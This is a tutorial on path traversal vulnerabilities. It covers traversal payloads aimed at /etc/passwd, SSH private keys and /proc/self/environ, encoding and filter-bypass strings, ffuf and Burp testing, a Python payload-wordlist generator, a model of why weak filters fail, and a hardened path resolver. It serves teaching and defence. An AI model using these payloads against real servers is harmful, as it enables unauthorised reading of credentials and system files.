Path Traversal Explained: Escaping the Web Root
Understanding and exploiting directory traversal vulnerabilities
What is Path Traversal?
Path Traversal (also called Directory Traversal) is a web security vulnerability in which an application builds a filesystem path from user-controlled input without constraining the result. By supplying “../” sequences and similar constructs, an attacker makes the application read, and in some cases write, files outside the directory it was meant to serve.
Normal File Access
Legitimate request for an image:
GET /images/profile.jpg HTTP/1.1
Path Traversal Attack
Malicious request to access sensitive files:
GET /images/../../../../etc/passwd HTTP/1.1
How Path Traversal Works
A vulnerable application concatenates a base directory with the user-supplied path and hands the result straight to the filesystem. The operating system resolves each “../” component by stepping up one directory, so enough of them walk the path out of the web root; any surplus “../” beyond the filesystem root is simply ignored, which is why attackers send more than they need. From there the attacker can reach any file the web server process is permitted to read.
Common Vulnerable Scenarios
1. File Download Functionality
https://example.com/download?file=../../../../etc/passwd
2. Image Loading
https://example.com/loadImage?img=../../../.ssh/id_rsa
3. Template Inclusion
https://example.com/render?template=../../../../proc/self/environ
Path Traversal Techniques
Technique | Example | Purpose |
---|---|---|
Basic traversal | ../../etc/passwd | Standard path traversal |
URL encoding | ..%2F..%2Fetc%2Fpasswd | Bypass filters that look for a literal “../” before the framework decodes the parameter |
Double encoding | ..%252F..%252Fetc%252Fpasswd | Bypass when the input is decoded twice (for example once by a proxy or WAF and again by the application) |
Null byte | ../../etc/passwd%00 | Truncate the string in runtimes that treat NUL as end-of-string, so an extension the application appends (such as “.jpg”) is dropped; historic technique, modern PHP and Java reject embedded NULs |
Absolute path | /etc/passwd | Direct file reference where the input is used as the whole path, or where the join discards the base directory when the input is absolute |
Testing for Path Traversal
1. Manual Testing
- Identify file parameters (file, path, doc, etc.)
- Try basic traversal sequences
- Experiment with different encodings
- Test for file existence
2. Common Files to Check
- /etc/passwd (world-readable on every Linux host; the standard proof of read)
- /etc/shadow (only readable if the web server runs as root)
- /proc/self/environ (environment of the web server process, often containing secrets)
- /var/log/apache2/access.log (confirms the server type and may enable log poisoning)
- C:\Windows\System32\drivers\etc\hosts (world-readable on Windows)
3. Automated Tools
# Using Burp Suite
1. Spider the application
2. Find file parameters
3. Use Intruder with traversal payloads

# Using ffuf
ffuf -u "https://example.com/download?file=FUZZ" -w traversal.txt
Filter the noise with -fs (drop responses of the usual error size) or -mr "root:x:" (match a string only a real /etc/passwd contains) so successful reads stand out.
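The wordlist passed to ffuf or Intruder above is easy to build systematically rather than by hand. The following is an added example (not code from the original page): it combines each encoding from the techniques table with a range of depths, a few target files and the extension-bypass suffixes. The TOKENS, TARGETS and SUFFIXES lists are constructed for illustration and can be extended.

```python
from itertools import product

# Ways to spell "one directory up" and the separator that follows it, as
# (up, separator, separator_used_inside_the_target). The strip-once form
# ("....//") is built so that a filter deleting "../" a single time leaves a
# fresh "../" behind. Constructed list; extend as needed.
TOKENS = {
    "plain":       ("..",     "/",     "/"),
    "backslash":   ("..",     "\\",    "\\"),
    "url":         ("..",     "%2f",   "%2f"),
    "double-url":  ("..",     "%252f", "%252f"),
    "dot-encoded": ("%2e%2e", "%2f",   "%2f"),
    "strip-once":  ("....",   "//",    "/"),
}

# Files worth probing, relative to the filesystem root, per platform (constructed list).
TARGETS = {
    "linux":   ["etc/passwd", "proc/self/environ"],
    "windows": ["Windows/System32/drivers/etc/hosts"],
}

# Extension-check bypass suffixes; "" means no suffix.
SUFFIXES = ["", "%00.jpg", "?.jpg", "%23.jpg"]


def generate_payloads(min_depth=1, max_depth=8, platforms=("linux", "windows")):
    """Return every combination of token, depth, target and suffix, deduplicated
    and in a stable order so the wordlist diffs cleanly between runs."""
    out, seen = [], set()
    for platform in platforms:
        for target in TARGETS[platform]:
            combos = product(TOKENS.values(), range(min_depth, max_depth + 1), SUFFIXES)
            for (up, sep, tsep), depth, suffix in combos:
                payload = (up + sep) * depth + target.replace("/", tsep) + suffix
                if payload not in seen:
                    seen.add(payload)
                    out.append(payload)
    return out


def write_wordlist(path, payloads):
    """One payload per line, ready for `ffuf -w` or Burp Intruder's simple list.
    Returns the number of payloads written."""
    with open(path, "w") as f:
        f.write("\n".join(payloads) + "\n")
    return len(payloads)


if __name__ == "__main__":
    n = write_wordlist("traversal.txt", generate_payloads())
    print(n, "payloads written to traversal.txt")
```

Depth 8 is usually enough on Linux (web roots rarely sit more than a handful of directories below “/”), and because surplus “../” are ignored there is no harm in overshooting; keep the list small enough that response-size filtering in ffuf stays meaningful.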
Bypassing Defenses
1. Path Normalization Bypass
....//
....\/
..\/..
%2e%2e%2f
.%2e/%2e%2e/%2f
The first three target filters that delete a single “../” or “..\” in one non-recursive pass, or that treat only one of “/” and “\” as a separator: stripping the inner sequence leaves a fresh traversal behind. The encoded forms defeat checks that run on the raw parameter before the framework URL-decodes it.
2. Starting Directory Bypass
When restricted to a specific directory:
/var/www/html/uploads/../../../etc/passwd
uploads/../../../../etc/passwd
If the application insists that the path start with a known directory (or prepends one itself), supply that prefix and traverse after it; the check passes on the string, and the filesystem still resolves the “../” that follow.
3. File Extension Bypass
When required extensions are enforced:
../../etc/passwd%00.jpg
../../etc/passwd?.jpg
../../etc/passwd%23.jpg
The null byte truncates the path only in runtimes that stop at NUL (older PHP, Java before 7u40); current versions reject the request instead. The “?” and “#” variants work when the application fetches the file through a further HTTP request or a URL-parsing library that strips the query string or fragment; against a direct filesystem open they simply produce a file name that does not exist.
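To see why the encoded and “....//” payloads from the techniques table and the bypass lists above get through, it helps to model the order in which a typical request pipeline filters and decodes. The following is an added example (not code from the original page) with two deliberately weak filters and a hypothetical web root; nothing is opened on disk, the code only computes the path the file API would finally receive.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical web root; paths are only computed, never opened.
WEBROOT = "/var/www/html/images"


def strip_dotdot_once(p):
    """Filter A: delete every literal '../' in one non-recursive pass.
    A common, wrong 'sanitiser'."""
    return p.replace("../", "")


def reject_dotdot(p):
    """Filter B: refuse the request if the string it is handed contains '../'."""
    if "../" in p:
        raise ValueError("blocked by filter")
    return p


def server_model(payload, checks, decode_before=0, decode_after=1):
    """Model of a request pipeline: `decode_before` URL-decodes happen in front
    of the checks (e.g. in a reverse proxy or WAF), the checks run, then the
    application framework decodes `decode_after` more times and resolves the
    path. Returns the path the file API would finally open."""
    p = payload
    for _ in range(decode_before):
        p = unquote(p)
    for check in checks:
        p = check(p)
    for _ in range(decode_after):
        p = unquote(p)
    return posixpath.normpath(posixpath.join(WEBROOT, p))


def blocked(payload, checks, decode_before=0, decode_after=1):
    """True if the pipeline refuses the payload, False if it resolves a path."""
    try:
        server_model(payload, checks, decode_before, decode_after)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Filter A strips '../' once: the plain payload is neutered, '....//' is not.
    print(server_model("../../../../etc/passwd", [strip_dotdot_once], 0, 0))
    print(server_model("....//" * 4 + "etc/passwd", [strip_dotdot_once], 0, 0))
    # Filter B runs before the framework decodes: '%2e%2e%2f' is invisible to it.
    print(server_model("%2e%2e%2f" * 4 + "etc%2fpasswd", [reject_dotdot]))
    # Proxy decodes once, app checks, app decodes again: double encoding slips
    # through while single encoding is caught.
    print(server_model("..%252f" * 4 + "etc%252fpasswd", [reject_dotdot], 1, 1))
    print(blocked("..%2f" * 4 + "etc%2fpasswd", [reject_dotdot], 1, 1))
```

The same model shows the fix: if the check ran on the fully decoded, normalised path and compared it against WEBROOT instead of looking for a substring, none of these payloads would resolve outside the root.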
Real-World Examples
Case 1: Web Server Configuration
A CMS plugin allowed file downloads via a parameter vulnerable to traversal, exposing server credentials.
Case 2: Image Processing Service
An image resizing service didn’t validate input paths, allowing access to AWS credentials.
Case 3: Log Viewer Application
A web-based log viewer accepted arbitrary paths, exposing sensitive system files.
Prevention and Mitigation
1. Input Validation
- Prefer an allowlist of permitted characters or, better, of permitted file names
- Rejecting “../” alone is insufficient: encoded, doubled and mixed-separator variants slip past a substring check
- Canonicalize the full path (resolve “..” and symlinks) and only then verify it still lies under the intended base directory
2. Secure File Operations
- Use index-based file access (map an ID or allowlisted name to a path) when possible
- Prepending a base directory is not enough on its own; verify that the canonicalized result stays under that directory
- Use chroot jails or containers for sensitive operations
3. Server Configuration
- Run web server with least privileges
- Use filesystem permissions effectively
- Regularly audit file access logs
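The mechanics described under “How Path Traversal Works” and the canonicalize-then-compare rule above, side by side, as an added example (not code from the original page). It builds a throwaway directory tree with a web root, a secret outside it and a symlink inside the root that points at the secret, then resolves the same requests with the naive join-and-open pattern and with a hardened resolver. ALLOWED_EXT, the file names and the file contents are constructed for the demo.

```python
import os
import shutil
import tempfile
from urllib.parse import unquote

# Hypothetical allowlist for an image-serving endpoint.
ALLOWED_EXT = {".jpg", ".png", ".gif"}


def build_demo_tree():
    """Constructed demo data (not a real server):
       <tmp>/webroot/images/profile.jpg
       <tmp>/webroot/images/link.jpg  -> <tmp>/secret.txt   (symlink out of the root)
       <tmp>/secret.txt                                      (outside the web root)
    Returns (webroot, secret)."""
    root = tempfile.mkdtemp(prefix="traversal-demo-")
    webroot = os.path.join(root, "webroot")
    os.makedirs(os.path.join(webroot, "images"))
    with open(os.path.join(webroot, "images", "profile.jpg"), "wb") as f:
        f.write(b"\xff\xd8fake-jpeg")
    secret = os.path.join(root, "secret.txt")
    with open(secret, "w") as f:
        f.write("db_password=hunter2\n")
    os.symlink(secret, os.path.join(webroot, "images", "link.jpg"))
    return webroot, secret


def vulnerable_resolve(webroot, requested):
    """The bug from the article: decode, glue the web root onto the request and
    let the OS resolve '..'. normpath collapses 'images/../../' straight past the
    web root, and '../' components beyond '/' are silently dropped, so an
    attacker simply sends more of them than necessary."""
    return os.path.normpath(os.path.join(webroot, unquote(requested).lstrip("/")))


def vulnerable_read(webroot, requested):
    with open(vulnerable_resolve(webroot, requested), "rb") as f:
        return f.read()


def safe_resolve(webroot, requested):
    """Hardened version. Order matters: decode, reject NUL, canonicalise with
    realpath (which also follows symlinks), and only THEN compare with the
    canonical base. Returns the resolved path, or None if the request is refused."""
    base = os.path.realpath(webroot)
    candidate = unquote(requested)
    if "\x00" in candidate:                                   # %00 truncation tricks
        return None
    candidate = candidate.replace("\\", "/").lstrip("/")      # '..\' is traversal too
    full = os.path.realpath(os.path.join(base, candidate))
    if os.path.commonpath([base, full]) != base:              # escaped the root (incl. via symlink)
        return None
    if os.path.splitext(full)[1].lower() not in ALLOWED_EXT:  # extension allowlist
        return None
    return full


def safe_read(webroot, requested):
    full = safe_resolve(webroot, requested)
    if full is None:
        return None
    with open(full, "rb") as f:
        return f.read()


def run_demo():
    """Build the tree, exercise both resolvers, clean up, return what each saw."""
    webroot, secret = build_demo_tree()
    try:
        return {
            "vuln_leak":      vulnerable_read(webroot, "images/../../secret.txt"),
            "vuln_symlink":   vulnerable_read(webroot, "images/link.jpg"),
            "over_traversal": vulnerable_resolve(webroot, "../" * 12 + "etc/passwd"),
            "safe_dotdot":    safe_resolve(webroot, "images/../../secret.txt"),
            "safe_encoded":   safe_resolve(webroot, "images%2f..%2f..%2fsecret.txt"),
            "safe_backslash": safe_resolve(webroot, "images/..%5c..%5csecret.txt"),
            "safe_nul":       safe_resolve(webroot, "images/profile.jpg%00.txt"),
            "safe_symlink":   safe_resolve(webroot, "images/link.jpg"),
            "safe_ok":        safe_read(webroot, "images/profile.jpg"),
        }
    finally:
        shutil.rmtree(os.path.dirname(webroot))


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name:15} {value!r}")
```

The symlink case is the one a normpath-only check misses: “images/link.jpg” looks like it stays inside the web root textually, yet the file it opens lives outside it. realpath plus commonpath catches that; a string-prefix comparison (`full.startswith(base)`) would also wrongly accept a sibling directory such as “webroot2”, which is why commonpath is used.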
Conclusion
Path Traversal remains a critical vulnerability because:
- It’s often easy to exploit
- The impact can be severe (credential theft, source code disclosure and, where files can also be written, code execution)
- Many developers underestimate the risk